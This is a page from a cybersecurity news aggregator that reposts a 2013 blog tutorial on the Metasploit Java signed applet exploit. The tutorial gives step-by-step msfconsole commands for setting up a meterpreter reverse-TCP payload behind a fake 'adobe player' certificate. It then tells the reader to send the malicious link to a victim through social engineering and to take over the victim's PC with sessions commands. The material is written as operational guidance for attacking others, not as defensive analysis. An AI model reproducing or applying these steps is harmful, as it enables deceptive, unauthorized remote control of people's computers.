Welcome to our

Cyber Security News Aggregator

.

Cyber Tzar

provide a

cyber security risk management

platform; including automated penetration tests and risk assesments culminating in a "cyber risk score" out of 1,000, just like a credit score.

JAVA SIGNED APPLET EXPLOIT

published on 2013-05-06 10:05:00 UTC by lotaya
Content:


This exploit dynamically creates a .jar file via the Msf:: Exploit::Java mixin, then signs the it. The resulting signed applet is presented to the victim via a web page with an applet tag. The victim’s JVM will pop a dialog asking if they trust the signed applet. On older versions the dialog will display the value of CERTCN in the “Publisher” line. Newer JVMs display “UNKNOWN” when the signature is not trusted (i.e., it’s not signed by a trusted CA). The SigningCert option allows you to provide a trusted code signing cert, the values in which will override CERTCN. If SigningCert is not given, a randomly generated self-signed cert will be used. Either way, once the user clicks “run”, the applet executes with full user permissions.

Open backtrack terminal type msfconsole

Now type use exploit/multi/browser/java_signed_applet press enter

Msf exploit (Java_signed-applet)>Set payload windows/meterpreter/reverse_tcp

Msf exploit (Java_signed-applet)>Set appletname adobe (The main applet’s class name)

Msf exploit (Java_signed-applet)>Set certcn adobe player (value for the certificate)

Msf exploit (Java_signed-applet)>Set srvhost 192.168.1.4 (This must be an address on the local machine)

Msf exploit (Java_signed-applet)>Set srvport 80 (The local port to listen on default: 8080)

Msf exploit (Java_signed-applet)>Set uripath adobevideos (The Url to use for this exploit)

Msf exploit (Java_signed-applet)>Set lport 443

Msf exploit (Java_signed-applet)>exploit 

Now an URL you should give to your victim http://192.168.1.4/adobevideos

Send the link of the server to the victim via chat or email or any social engineering technique.
When the victim open that link in their browser, immediately it will alert a dialog box about digital signature cannot be verified like picture below.

You now have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

VIDEO TUTORIAL: http://adf.ly/OUZOp

soruce : http://backtrack-page.blogspot.com
Article: JAVA SIGNED APPLET EXPLOIT - published about 11 years ago.

http://hacking-share.blogspot.com/2013/05/java-signed-applet-exploit.html   
Published: 2013 05 06 10:05:00
Received: 2024 02 07 05:20:21
Feed: Hacking Share
Source: Hacking Share
Category: Cyber Security
Topic: Cyber Security
Views: 1

Custom HTML Block

Click to Open Code Editor